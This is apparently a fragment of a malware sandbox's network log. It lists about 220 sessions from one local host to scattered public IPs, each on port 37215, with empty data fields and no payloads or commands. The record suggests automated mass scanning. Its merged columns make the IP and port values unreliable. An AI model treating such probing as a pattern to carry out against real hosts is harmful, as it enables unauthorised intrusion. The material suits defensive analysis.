                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17664192.168.2.233777041.41.141.25437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17665192.168.2.2349606122.12.124.8137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17666192.168.2.235729051.2.68.2237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17667192.168.2.233638069.53.151.23937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17668192.168.2.233383641.190.227.20637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17669192.168.2.234444041.83.226.837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17670192.168.2.2352400197.209.109.15337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17671192.168.2.2346268197.54.45.13937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17672192.168.2.233923841.24.178.11437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17673192.168.2.2336896197.10.166.20537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17674192.168.2.2357958106.95.149.137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17675192.168.2.2342478157.113.89.25037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17676192.168.2.2352548157.201.214.21237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17677192.168.2.2354656197.167.56.10937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17678192.168.2.234910814.132.90.20637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17679192.168.2.2359750157.48.145.9037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17680192.168.2.2336454157.236.210.15337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17681192.168.2.2344056157.36.140.8237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17682192.168.2.2346164157.204.107.10837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17683192.168.2.2342388205.24.126.17037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17684192.168.2.233440641.19.24.11137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17685192.168.2.234285841.208.167.21937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17686192.168.2.234807090.124.27.15737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17687192.168.2.2353372194.181.159.13137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17688192.168.2.2342616157.191.50.15837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17689192.168.2.233798041.58.198.22637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17690192.168.2.2360782176.58.54.3337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17691192.168.2.234938241.234.107.16637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17692192.168.2.2338504157.39.138.23237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17693192.168.2.235800241.93.55.22737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17694192.168.2.235913641.230.237.11837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17695192.168.2.2360206213.43.6.23437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17696192.168.2.233532241.224.242.19437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17697192.168.2.2339222197.32.227.337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17698192.168.2.2337948157.68.103.3437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17699192.168.2.2336604157.61.95.19337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17700192.168.2.2351688197.134.224.23537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17701192.168.2.2354156197.130.171.11837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17702192.168.2.235939241.85.139.8937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17703192.168.2.235362014.121.188.8837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17704192.168.2.2335068157.96.24.10437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17705192.168.2.2354850197.8.196.6437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17706192.168.2.23379269.210.238.18037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17707192.168.2.2338504197.6.127.25237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17708192.168.2.2338944157.149.249.14737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17709192.168.2.2336622110.122.17.9537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17710192.168.2.2343058197.84.240.1737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17711192.168.2.2360978197.14.62.8837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17712192.168.2.2339300157.248.36.20837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17713192.168.2.2352452157.24.26.15037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17714192.168.2.235314641.230.131.20437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17715192.168.2.2351082157.250.201.16337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17716192.168.2.2353526200.76.14.10537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17717192.168.2.234077241.109.161.6637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17718192.168.2.235641841.30.253.18537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17719192.168.2.2335064165.18.167.14737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17720192.168.2.235108068.153.224.21337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17721192.168.2.2349242197.203.95.2737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17722192.168.2.2340354157.130.69.16937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17723192.168.2.235593241.241.155.937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17724192.168.2.2355136102.171.40.18637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17725192.168.2.2342744157.202.25.18637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17726192.168.2.234092441.15.165.13637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17727192.168.2.2358934197.183.102.10037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17728192.168.2.2344536114.86.67.17737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17729192.168.2.235207841.25.10.17637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17730192.168.2.2359744157.227.30.4337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17731192.168.2.235947224.189.203.21737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17732192.168.2.2347078157.165.64.16837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17733192.168.2.2351488137.243.51.3537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17734192.168.2.2353360191.92.17.24537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17735192.168.2.2339104157.129.174.20337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17736192.168.2.2360482197.164.136.21137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17737192.168.2.2355780155.108.249.15137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17738192.168.2.2354916157.10.200.9137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17739192.168.2.234359641.29.120.1037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17740192.168.2.235619492.46.143.11337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17741192.168.2.2345004157.144.149.3337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17742192.168.2.2354394209.123.48.24737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17743192.168.2.2348454175.197.183.15037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17744192.168.2.235481027.44.238.19237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17745192.168.2.234906869.76.190.17037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17746192.168.2.2333998157.92.108.21537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17747192.168.2.2344444157.33.211.6437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17748192.168.2.2350874197.217.48.12237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17749192.168.2.2348912107.221.1.14437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17750192.168.2.235385857.199.17.23037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17751192.168.2.2348380157.183.244.21637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17752192.168.2.2355854197.87.62.13037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17753192.168.2.2337036157.195.35.8037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17754192.168.2.2347914104.43.227.14537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17755192.168.2.233626492.66.11.11337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17756192.168.2.23351065.70.40.7737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17757192.168.2.235248251.160.82.21937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17758192.168.2.2348880157.148.160.19937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17759192.168.2.235191286.18.62.24537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17760192.168.2.234569441.34.199.8837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17761192.168.2.2343872131.50.132.16537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17762192.168.2.2342700145.11.168.14237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17763192.168.2.2341750157.117.70.24037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17764192.168.2.2355644157.20.115.15137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17765192.168.2.233666041.199.212.25437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17766192.168.2.234238087.84.11.18837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17767192.168.2.233545441.95.42.2437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17768192.168.2.2349386157.112.34.9337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17769192.168.2.2357722135.29.254.8737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17770192.168.2.2337374157.247.137.5037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17771192.168.2.2343478197.38.209.24737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17772192.168.2.2354570197.238.247.25237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17773192.168.2.233309041.119.189.21837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17774192.168.2.2346574157.135.135.2237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17775192.168.2.235699841.17.244.1237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17776192.168.2.2354824197.164.209.13137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17777192.168.2.2342118197.210.32.237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17778192.168.2.233559841.245.51.13237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17779192.168.2.2352158157.79.177.3337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17780192.168.2.2352368220.95.209.4137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17781192.168.2.2355756197.173.123.13637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17782192.168.2.2357052157.114.126.4437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17783192.168.2.2349298197.232.158.20537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17784192.168.2.2347574157.250.104.937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17785192.168.2.2356714103.25.80.8337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17786192.168.2.2335636220.57.171.12637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17787192.168.2.233779641.181.147.5937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17788192.168.2.2358294129.254.249.3537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17789192.168.2.235900025.184.158.13637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17790192.168.2.2360888157.135.237.237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17791192.168.2.2335020197.104.39.17837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17792192.168.2.2339860197.84.70.15037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17793192.168.2.2334436197.7.36.15437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17794192.168.2.235049691.18.182.10037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17795192.168.2.2332944197.16.187.14637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17796192.168.2.233576641.205.111.1237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17797192.168.2.235728614.103.98.5037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17798192.168.2.234629441.103.234.12837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17799192.168.2.2354282197.230.127.24537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17800192.168.2.2358464157.212.46.22837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17801192.168.2.235538641.135.249.6637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17802192.168.2.2338296169.246.199.17537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17803192.168.2.2333830157.172.207.15037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17804192.168.2.2335934197.155.93.4437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17805192.168.2.2360380197.25.59.17137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17806192.168.2.2340122157.130.16.20337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17807192.168.2.2339432157.42.24.20337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17808192.168.2.2333380157.135.236.21237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17809192.168.2.2336896197.243.196.18637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17810192.168.2.2348512197.12.43.537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17811192.168.2.233337241.31.11.18937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17812192.168.2.2347074157.12.165.12237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17813192.168.2.2345518134.192.106.24337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17814192.168.2.235493441.192.254.5837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17815192.168.2.235313041.15.42.5337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17816192.168.2.2341572197.235.169.17237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17817192.168.2.233432041.60.101.24337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17818192.168.2.2341326197.148.99.7937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17819192.168.2.2340854197.83.110.837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17820192.168.2.2342634197.68.35.4937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17821192.168.2.2360676126.196.81.4437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17822192.168.2.2333560157.30.254.11037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17823192.168.2.236081441.172.121.18637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17824192.168.2.2340508147.93.31.4637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17825192.168.2.2349380157.206.136.4737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17826192.168.2.234749852.101.121.5737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17827192.168.2.2346026105.249.83.18537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17828192.168.2.236031041.27.167.16037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17829192.168.2.2354810197.31.191.7937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17830192.168.2.2343152157.64.119.23837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17831192.168.2.235128441.108.244.1237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17832192.168.2.2355502138.27.77.25337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17833192.168.2.2358540138.158.143.22637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17834192.168.2.2339522157.171.154.8237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17835192.168.2.2342396197.192.61.5937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17836192.168.2.2340396157.140.126.4337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17837192.168.2.2346152157.244.147.9537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17838192.168.2.2357518110.43.255.23037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17839192.168.2.234475641.154.217.2237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17840192.168.2.2345920157.76.213.5037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17841192.168.2.2341196157.186.203.18937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17842192.168.2.233278641.85.184.19137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17843192.168.2.2355676157.1.192.5637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17844192.168.2.233728241.217.147.8537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17845192.168.2.234165077.135.95.25037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17846192.168.2.235118020.101.198.25237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17847192.168.2.234924241.212.20.13537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17848192.168.2.233400241.217.217.1837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17849192.168.2.2341378157.89.77.20737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17850192.168.2.235863641.214.173.11337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17851192.168.2.235907241.172.63.4937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17852192.168.2.2344524172.174.15.22637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17853192.168.2.233316041.113.37.8237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17854192.168.2.2344538158.32.206.17837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17855192.168.2.234570841.233.196.8937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17856192.168.2.2333208157.202.199.9437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17857192.168.2.2337276157.159.26.11537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17858192.168.2.234842441.203.63.237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17859192.168.2.233288086.173.32.4137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17860192.168.2.2349292191.112.51.20237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17861192.168.2.233750681.6.204.2537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17862192.168.2.235022241.255.108.5237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17863192.168.2.234164641.94.218.337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17864192.168.2.2341672157.101.42.7737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17865192.168.2.2348802208.97.143.14137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17866192.168.2.2352086157.224.85.3937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17867192.168.2.235941641.170.2.10437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17868192.168.2.2336224183.179.54.6237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17869192.168.2.2355300159.42.58.19737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17870192.168.2.2348508157.120.33.12237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17871192.168.2.236030241.246.183.17537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17872192.168.2.2350462197.175.62.11337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17873192.168.2.2356522157.163.40.7737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17874192.168.2.2346248197.216.105.3337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17875192.168.2.2346734157.175.209.22137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17876192.168.2.2341930197.146.179.737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17877192.168.2.2333122216.190.150.537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17878192.168.2.2345246157.15.141.12037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17879192.168.2.2351068185.28.84.15137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17880192.168.2.234612641.150.100.10837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17881192.168.2.2336012157.240.156.11337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
